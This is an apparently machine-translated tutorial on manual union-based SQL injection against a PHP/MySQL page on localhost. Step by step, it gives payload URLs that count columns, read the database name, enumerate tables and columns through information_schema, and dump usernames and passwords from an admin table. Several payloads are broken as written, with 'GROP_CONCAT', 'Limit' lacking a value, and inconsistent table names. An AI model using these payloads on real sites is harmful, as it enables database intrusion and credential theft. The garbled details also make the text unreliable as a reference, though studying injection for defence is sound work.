The basic process of php+mysql injection

1: Validation injection (and 1=1)

URL:HTTP://127.0.0.1/TEST.PHP?ID=9 and 1=1 SQL statement: SELECT * FROM article WHERE id = ' 9 and 1=1 '; return to normal

HTTP://127.0.0.1/TEST.PHP?ID=9 and 1=2 SQL statement: SELECT * from aritcle where id = ' 9 and 1=2 '; return error

2: Determine the number of character segments (order by and Union)

2.1 ORDER BY

url:http://127.0.0.1/test.php?id=9 ORDER BY 1,2,3,4 SQL statement: SELECT * from aritcle where ID =9 order BY 4;

Order BY in the SQL statement is the ordering of the specified columns of the result set.

Example: When we test to the 7 times error, it indicates that the table has only 6 fields

2.2 UNION Select

URL:HTTP://127.0.0.1/TEST.PHP?ID=9 Union SELECT Null,null,null,null SQL statement: SELECT * from aritcle where id=9 Uni on select Null,null,null;

Union SELECT Union query: can be used for the result set of one or more SELECT, but he has a condition that
Is the two SELECT query statement query must have the same column to be able to execute, using this feature we can compare queries,
That is, when the column of our Union select is the same as the column it queries, the page returns to normal.

such as: When the field is 6, the page returns to normal, and the greater than or less than 6 pages will be an error.

Solve two minor problems:
Problem one: Most programs only call the first return of a database query (and so are we), and in the data that is queried through the Union,
The data we want to see is in the second article, if we want to see the data we want there are two ways, the first is to let the first piece of data return false,
The second is to return the data we want directly through the SQL statement.

Law one: We make the result of the first query always False

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select Null,null,null,null,null,null
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT null,null,null,null,null,null

Result: Return why nothing? Because our second query did not query what returned to null naturally there was nothing
Let's put the statement in MySQL and look at the results:

Law two: Through the limit statement, limit in MySQL is used for paging, we can also through him to get the result set we want

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select Null,null,null,null,null,null Limit
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT null,null,null,null,null,null Limit

Return is also empty, same as above results

Question two: Which column of data is displayed on the page, there may be some columns of data only used in the background program for data processing use,
is not displayed in the foreground, so we need to determine which field we can see. , we use numbers instead of NULL for querying,
Determined that the 2,3,4,5 four fields can be displayed on a page.
Why don't we start with numbers, because the union select not only requires the same number of columns, but also similar data types.

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select 1,2,3,4,5,6 Limit
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT 1,2,3,4,5,6 Limit

3. Querying the Database

You can get the database name: Test by using MySQL's own function () query.

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select 1,database (), 3,4,5,6 limit
SQL statement: SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT 1,database (), 3,4,5,6 limit

Result: The test is displayed

4. Check the name of the table

Our main use of the table name is the tables table.
Here we use the Group_concat it can return all the results of a query because we need to name the sensitive data that we need.
Our goal here is the admin table.

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union SELECT 1,GROP_CONCAT (table_name), 3,4,5,6 from Information_ Schema.tables where table_schema= ' test '
SQL statement: SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT 1,GROP_CONCAT (table_name), 3,4,5,6 from Information_sch Ema.tables where table_schema= ' test '

Result: All table names are displayed, the first is admin

5. Check the fields:
The INFORMATION_SCHEMA library is also used here, and the columns table is used here. Get field Id,username,password

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select 1,grop_concat (column_name), 3,4,5,6 from Information_ Schema.columns where table_schema= ' test ' and table_name= ' admin '
SQL statement: SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT 1,grop_concat (column_name), 3,4,5,6 from INFORMATION_SC Hema.columns where table_schema= ' test ' and table_name= ' admin '

Results: Id,username,password

6: Check Data

Url:http://127.0.0.1/test.php?id=9 and 1=2 Union select 1,grop_concat (Id,username,password), 3,4,5,6 from admin
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 Union SELECT 1,grop_concat (Id,username,password), 3,4,5,6 from admin
The results are coming out.

The basic process of php+mysql injection